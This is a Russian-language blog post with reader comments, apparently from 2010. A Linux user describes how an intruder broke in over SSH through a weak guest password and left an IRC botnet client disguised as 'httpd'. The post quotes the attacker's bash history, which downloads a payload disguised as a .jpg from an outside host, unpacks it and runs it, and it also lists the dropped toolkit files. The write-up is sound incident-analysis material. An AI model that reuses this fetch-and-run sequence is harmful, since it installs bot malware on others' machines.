Влезли через гостевую учётную запись

Сегодня, примерно в 20-00 я заметил, что проццессор на ноуте уж сильно нагрузился. Полез в top, а там…
процесс s от пользователя guest
Дело худо думаю, сразу же выдернул шнур, снял копию /var/log/

[email protected]:/# cat /var/log/auth.log |grep guest
Apr 12 19:30:33 laptop passwd[22431]: pam_unix(passwd:chauthtok): password changed for guest
Apr 12 20:51:57 laptop passwd[6132]: pam_unix(passwd:chauthtok): password changed for guest

Иду смотреть историю баша guest'а

# cat /home/guest/.bash_history
w
ps x
passwd
uname -a
cat /proc/cpuinfo
cd /var/tmp
wget freewebtown.com/goldeney/ht.jpg
tar xvf ht.jpg
rm -rf ht.jpg
cd .ht
./httpd


Не успел потереть историю баша значит. Иду в /vat/tmp/.ht/

[email protected]:/var/tmp/.ht# ls -al
итого 236
drwxr-xr-x 2 guest guest   4096 Апр 12 20:00 .
drwxrwxrwt 4 root  root    4096 Апр 12 21:17 ..
-rwxr-xr-x 1 guest guest    147 Июл 30  2004 clear.sh
-rw-r--r-- 1 guest guest    166 Апр 12 20:40 flood1.seen
-rw-r--r-- 1 guest guest     72 Апр 12 20:00 fwd
-rwxr-xr-x 1 guest guest 152108 Июн  1  2001 httpd
-rw-r--r-- 1 guest guest  22983 Июл 30  2004 mech.help
-rw-r--r-- 1 guest guest   1064 Апр 12 20:00 mech.levels
-rw-r--r-- 1 guest guest      6 Апр 12 19:36 mech.pid
-rw-r--r-- 1 guest guest    258 Апр 12 20:00 mech.session
-rw-r--r-- 1 guest guest    457 Фев 14 17:38 mech.set
-rwxr-xr-x 1 guest guest  13399 Июл 29  2004 s
-rwxr-xr-x 1 guest guest     67 Июл 30  2004 start.sh


Судя по датам, инструменты ооочень старые, но видимо работают стабильно. Там же есть хелп (mech.help)

Мониторю who, top, .bash_history. Пока чисто.

Пользователя guest я завел давно, на всякий случай, чтобы можно было давать ноут поюзать в мое отсутствие. А там пароль не помню какой был, но помню что очень простой, типа 123, qwerty или guest. А с неделю назад я открыл 22 порт на всякий случай, нужен был доступ. Других портов открыто не было, никакими левыми программами не пользовался, только из репазиториев. Так что вывод пока таков: Влезли через ssh. Скорее всего это был простой бот.

Немного изучил содержимое этих файлов. Как я понял, это классическая схема:
идет коннект на закрытый канал закрытого irc-сервера, а оттуда уже зараженные компьютеры управляются. Как-то давно помнится захаживал на кракерский irc-сервер, но на каналы не пускають =)
  • +3
  • 12 апреля 2010, 21:43
  • durman

Комментарии (9)

RSS свернуть / развернуть
+
0
Надо попробовать залезть на канал этих скрипткиддисов.
avatar

durman

  • 12 апреля 2010, 21:51
+
0
irc12.scriptkiddie.eu
Список каналов
#RootHelp 1
#piata 1
#N-A-S-A 1
#Servere 1
#g0v 1
#bengosii 1
#RTS 1
#Reteaua 1
#MultiMech 1
#test 1
#dede 2
#brother_of_metal 1
#rock 1
#brasil-usa 1
#skate 1
#redCode 2
#asds 2
#IceTeaM 2
#bd 2
#Hackers.From.All.Over.The.World.Unite 2
#academia-de-futut 2
#michiduta 3
#Grave 1
#mix 1
#face 1
#BIOS 1
#Gods 1
#inchisoare 1
#log 1
#umbra 2
#hack3r 5
#sell 3
#eggucs 3
#suflet 3
#Norys 6
#X 29
#root 10
* End of /LIST
avatar

durman

  • 12 апреля 2010, 21:56
+
0
Это можно удалить))
avatar

durman

  • 12 апреля 2010, 22:04
+
0
Ага, по 22 му все время ломятся боты
avatar

Gangsta

  • 12 апреля 2010, 22:16
+
0
Хороший топик по безопасности Linux. Нужно уметь обнаруживать симптомы вторжения.
avatar

yababay

  • 12 апреля 2010, 22:20
+
0
[email protected]:/# file /var/tmp/.ht/s
/var/tmp/.ht/s: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.0.0, not stripped

Видимо бинарник собран еще в тех мохнатых годах, когда линукс был 2.0
avatar

durman

  • 12 апреля 2010, 22:35
+
0
а в процессах что?
avatar

Gangsta

  • 12 апреля 2010, 22:39
+
0
В процессах щас то чисто.
avatar

durman

  • 12 апреля 2010, 22:42
+
0
Да уж, красиво!!!
avatar

ahmetzyanov_d

  • 13 апреля 2010, 17:54

Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.